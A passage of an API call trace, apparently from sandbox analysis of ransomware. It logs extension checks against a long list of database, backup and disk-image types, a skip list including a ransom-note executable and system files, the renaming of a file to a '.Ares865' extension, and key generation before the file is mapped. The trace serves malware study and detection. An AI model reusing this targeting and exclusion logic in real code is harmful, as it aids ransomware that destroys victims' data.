lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.222] lstrlenW (lpString="idb") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.222] lstrlenW (lpString="ihx") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.223] lstrlenW (lpString="itdb") returned 4 [0058.223] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.223] lstrlenW (lpString="itw") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.223] lstrlenW (lpString="jet") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.223] lstrlenW (lpString="jtx") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.223] lstrlenW (lpString="kdb") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.223] lstrlenW (lpString="kexi") returned 4 [0058.223] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.223] lstrlenW (lpString="kexic") returned 5 [0058.223] lstrcmpiW (lpString1="d.lnk", lpString2="kexic") returned -1 [0058.223] lstrlenW (lpString="kexis") returned 5 [0058.223] lstrcmpiW (lpString1="d.lnk", lpString2="kexis") returned -1 [0058.223] lstrlenW (lpString="lgc") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.223] lstrlenW (lpString="lwx") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.223] lstrlenW (lpString="maf") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.223] lstrlenW (lpString="maq") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.223] lstrlenW (lpString="mar") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.223] lstrlenW (lpString="marshal") returned 7 [0058.223] lstrcmpiW (lpString1="pad.lnk", lpString2="marshal") returned 1 [0058.223] lstrlenW (lpString="mas") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.223] lstrlenW (lpString="mav") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.223] lstrlenW (lpString="maw") returned 3 [0058.223] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.223] lstrlenW (lpString="mdbhtml") returned 7 [0058.223] lstrcmpiW (lpString1="pad.lnk", lpString2="mdbhtml") returned 1 [0058.224] lstrlenW (lpString="mdn") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.224] lstrlenW (lpString="mdt") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.224] lstrlenW (lpString="mfd") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.224] lstrlenW (lpString="mpd") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.224] lstrlenW (lpString="mrg") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.224] lstrlenW (lpString="mud") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.224] lstrlenW (lpString="mwb") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.224] lstrlenW (lpString="myd") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.224] lstrlenW (lpString="ndf") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.224] lstrlenW (lpString="nnt") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.224] lstrlenW (lpString="nrmlib") returned 6 [0058.224] lstrcmpiW (lpString1="ad.lnk", lpString2="nrmlib") returned -1 [0058.224] lstrlenW (lpString="ns2") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.224] lstrlenW (lpString="ns3") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.224] lstrlenW (lpString="ns4") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.224] lstrlenW (lpString="nsf") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.224] lstrlenW (lpString="nv") returned 2 [0058.224] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.224] lstrlenW (lpString="nv2") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.224] lstrlenW (lpString="nwdb") returned 4 [0058.224] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.224] lstrlenW (lpString="nyf") returned 3 [0058.224] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.224] lstrlenW (lpString="odb") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.225] lstrlenW (lpString="odb") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.225] lstrlenW (lpString="oqy") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.225] lstrlenW (lpString="ora") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.225] lstrlenW (lpString="orx") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.225] lstrlenW (lpString="owc") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.225] lstrlenW (lpString="p96") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.225] lstrlenW (lpString="p97") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.225] lstrlenW (lpString="pan") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.225] lstrlenW (lpString="pdb") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.225] lstrlenW (lpString="pdm") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.225] lstrlenW (lpString="pnz") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.225] lstrlenW (lpString="qry") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.225] lstrlenW (lpString="qvd") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.225] lstrlenW (lpString="rbf") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.225] lstrlenW (lpString="rctd") returned 4 [0058.225] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.225] lstrlenW (lpString="rod") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.225] lstrlenW (lpString="rodx") returned 4 [0058.225] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.225] lstrlenW (lpString="rpd") returned 3 [0058.225] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.225] lstrlenW (lpString="rsd") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.226] lstrlenW (lpString="sas7bdat") returned 8 [0058.226] lstrcmpiW (lpString1="epad.lnk", lpString2="sas7bdat") returned -1 [0058.226] lstrlenW (lpString="sbf") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.226] lstrlenW (lpString="scx") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.226] lstrlenW (lpString="sdb") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.226] lstrlenW (lpString="sdc") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.226] lstrlenW (lpString="sdf") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.226] lstrlenW (lpString="sis") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.226] lstrlenW (lpString="spq") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.226] lstrlenW (lpString="te") returned 2 [0058.226] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.226] lstrlenW (lpString="teacher") returned 7 [0058.226] lstrcmpiW (lpString1="pad.lnk", lpString2="teacher") returned -1 [0058.226] lstrlenW (lpString="tmd") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.226] lstrlenW (lpString="tps") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.226] lstrlenW (lpString="trc") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.226] lstrlenW (lpString="trc") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.226] lstrlenW (lpString="trm") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.226] lstrlenW (lpString="udb") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.226] lstrlenW (lpString="udl") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.226] lstrlenW (lpString="usr") returned 3 [0058.226] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.227] lstrlenW (lpString="v12") returned 3 [0058.227] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.227] lstrlenW (lpString="vis") returned 3 [0058.227] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.227] lstrlenW (lpString="vpd") returned 3 [0058.227] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.227] lstrlenW (lpString="vvv") returned 3 [0058.227] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.227] lstrlenW (lpString="wdb") returned 3 [0058.227] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.227] lstrlenW (lpString="wmdb") returned 4 [0058.227] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.227] lstrlenW (lpString="wrk") returned 3 [0058.227] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.227] lstrlenW (lpString="xdb") returned 3 [0058.227] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.227] lstrlenW (lpString="xld") returned 3 [0058.227] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.227] lstrlenW (lpString="xmlff") returned 5 [0058.227] lstrcmpiW (lpString1="d.lnk", lpString2="xmlff") returned -1 [0058.227] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Notepad.lnk.Ares865") returned 73 [0058.227] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\notepad.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Notepad.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\notepad.lnk.ares865"), dwFlags=0x1) returned 1 [0058.228] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Notepad.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\notepad.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.228] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1304) returned 1 [0058.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0058.228] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0058.229] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.229] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.229] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x154 [0058.231] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x190000 [0058.231] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0058.232] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.232] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.233] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.233] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.233] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.233] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.233] CloseHandle (hObject=0x154) returned 1 [0058.233] CloseHandle (hObject=0x15c) returned 1 [0058.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0058.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.234] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dcf29a8, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfec52d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Run.lnk", cAlternateFileName="")) returned 1 [0058.234] lstrcmpiW (lpString1="Run.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="aoldtz.exe") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2=".") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="..") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="windows") returned -1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="bootmgr") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="temp") returned -1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="pagefile.sys") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="boot") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="ids.txt") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="ntuser.dat") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="perflogs") returned 1 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2="MSBuild") returned 1 [0058.235] lstrlenW (lpString="Run.lnk") returned 7 [0058.235] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Notepad.lnk") returned 65 [0058.235] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Run.lnk" | out: lpString1="Run.lnk") returned="Run.lnk" [0058.235] lstrlenW (lpString="Run.lnk") returned 7 [0058.235] lstrlenW (lpString="Ares865") returned 7 [0058.235] lstrlenW (lpString=".dll") returned 4 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2=".dll") returned 1 [0058.235] lstrlenW (lpString=".lnk") returned 4 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2=".lnk") returned 1 [0058.235] lstrlenW (lpString=".ini") returned 4 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2=".ini") returned 1 [0058.235] lstrlenW (lpString=".sys") returned 4 [0058.235] lstrcmpiW (lpString1="Run.lnk", lpString2=".sys") returned 1 [0058.235] lstrlenW (lpString="Run.lnk") returned 7 [0058.235] lstrlenW (lpString="bak") returned 3 [0058.235] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.235] lstrlenW (lpString="ba_") returned 3 [0058.235] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.235] lstrlenW (lpString="dbb") returned 3 [0058.235] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.235] lstrlenW (lpString="vmdk") returned 4 [0058.235] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.235] lstrlenW (lpString="rar") returned 3 [0058.235] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.236] lstrlenW (lpString="zip") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.236] lstrlenW (lpString="tgz") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.236] lstrlenW (lpString="vbox") returned 4 [0058.236] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.236] lstrlenW (lpString="vdi") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.236] lstrlenW (lpString="vhd") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.236] lstrlenW (lpString="vhdx") returned 4 [0058.236] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.236] lstrlenW (lpString="avhd") returned 4 [0058.236] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.236] lstrlenW (lpString="db") returned 2 [0058.236] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.236] lstrlenW (lpString="db2") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.236] lstrlenW (lpString="db3") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.236] lstrlenW (lpString="dbf") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.236] lstrlenW (lpString="mdf") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.236] lstrlenW (lpString="mdb") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.236] lstrlenW (lpString="sql") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.236] lstrlenW (lpString="sqlite") returned 6 [0058.236] lstrcmpiW (lpString1="un.lnk", lpString2="sqlite") returned 1 [0058.236] lstrlenW (lpString="sqlite3") returned 7 [0058.236] lstrlenW (lpString="sqlitedb") returned 8 [0058.236] lstrlenW (lpString="xml") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.236] lstrlenW (lpString="$er") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.236] lstrlenW (lpString="4dd") returned 3 [0058.236] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.237] lstrlenW (lpString="4dl") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.237] lstrlenW (lpString="^^^") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.237] lstrlenW (lpString="abs") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.237] lstrlenW (lpString="abx") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.237] lstrlenW (lpString="accdb") returned 5 [0058.237] lstrcmpiW (lpString1="n.lnk", lpString2="accdb") returned 1 [0058.237] lstrlenW (lpString="accdc") returned 5 [0058.237] lstrcmpiW (lpString1="n.lnk", lpString2="accdc") returned 1 [0058.237] lstrlenW (lpString="accde") returned 5 [0058.237] lstrcmpiW (lpString1="n.lnk", lpString2="accde") returned 1 [0058.237] lstrlenW (lpString="accdr") returned 5 [0058.237] lstrcmpiW (lpString1="n.lnk", lpString2="accdr") returned 1 [0058.237] lstrlenW (lpString="accdt") returned 5 [0058.237] lstrcmpiW (lpString1="n.lnk", lpString2="accdt") returned 1 [0058.237] lstrlenW (lpString="accdw") returned 5 [0058.237] lstrcmpiW (lpString1="n.lnk", lpString2="accdw") returned 1 [0058.237] lstrlenW (lpString="accft") returned 5 [0058.237] lstrcmpiW (lpString1="n.lnk", lpString2="accft") returned 1 [0058.237] lstrlenW (lpString="adb") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.237] lstrlenW (lpString="adb") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.237] lstrlenW (lpString="ade") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.237] lstrlenW (lpString="adf") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.237] lstrlenW (lpString="adn") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.237] lstrlenW (lpString="adp") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.237] lstrlenW (lpString="alf") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.237] lstrlenW (lpString="ask") returned 3 [0058.237] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.238] lstrlenW (lpString="btr") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.238] lstrlenW (lpString="cat") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.238] lstrlenW (lpString="cdb") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.238] lstrlenW (lpString="ckp") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.238] lstrlenW (lpString="cma") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.238] lstrlenW (lpString="cpd") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.238] lstrlenW (lpString="dacpac") returned 6 [0058.238] lstrcmpiW (lpString1="un.lnk", lpString2="dacpac") returned 1 [0058.238] lstrlenW (lpString="dad") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.238] lstrlenW (lpString="dadiagrams") returned 10 [0058.238] lstrlenW (lpString="daschema") returned 8 [0058.238] lstrlenW (lpString="db-journal") returned 10 [0058.238] lstrlenW (lpString="db-shm") returned 6 [0058.238] lstrcmpiW (lpString1="un.lnk", lpString2="db-shm") returned 1 [0058.238] lstrlenW (lpString="db-wal") returned 6 [0058.238] lstrcmpiW (lpString1="un.lnk", lpString2="db-wal") returned 1 [0058.238] lstrlenW (lpString="dbc") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.238] lstrlenW (lpString="dbs") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.238] lstrlenW (lpString="dbt") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.238] lstrlenW (lpString="dbv") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.238] lstrlenW (lpString="dbx") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.238] lstrlenW (lpString="dcb") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.238] lstrlenW (lpString="dct") returned 3 [0058.238] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.239] lstrlenW (lpString="dcx") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.239] lstrlenW (lpString="ddl") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.239] lstrlenW (lpString="dlis") returned 4 [0058.239] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.239] lstrlenW (lpString="dp1") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.239] lstrlenW (lpString="dqy") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.239] lstrlenW (lpString="dsk") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.239] lstrlenW (lpString="dsn") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.239] lstrlenW (lpString="dtsx") returned 4 [0058.239] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.239] lstrlenW (lpString="dxl") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.239] lstrlenW (lpString="eco") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.239] lstrlenW (lpString="ecx") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.239] lstrlenW (lpString="edb") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.239] lstrlenW (lpString="epim") returned 4 [0058.239] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.239] lstrlenW (lpString="fcd") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.239] lstrlenW (lpString="fdb") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.239] lstrlenW (lpString="fic") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.239] lstrlenW (lpString="flexolibrary") returned 12 [0058.239] lstrlenW (lpString="fm5") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.239] lstrlenW (lpString="fmp") returned 3 [0058.239] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.239] lstrlenW (lpString="fmp12") returned 5 [0058.240] lstrcmpiW (lpString1="n.lnk", lpString2="fmp12") returned 1 [0058.240] lstrlenW (lpString="fmpsl") returned 5 [0058.240] lstrcmpiW (lpString1="n.lnk", lpString2="fmpsl") returned 1 [0058.240] lstrlenW (lpString="fol") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.240] lstrlenW (lpString="fp3") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.240] lstrlenW (lpString="fp4") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.240] lstrlenW (lpString="fp5") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.240] lstrlenW (lpString="fp7") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.240] lstrlenW (lpString="fpt") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.240] lstrlenW (lpString="frm") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.240] lstrlenW (lpString="gdb") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 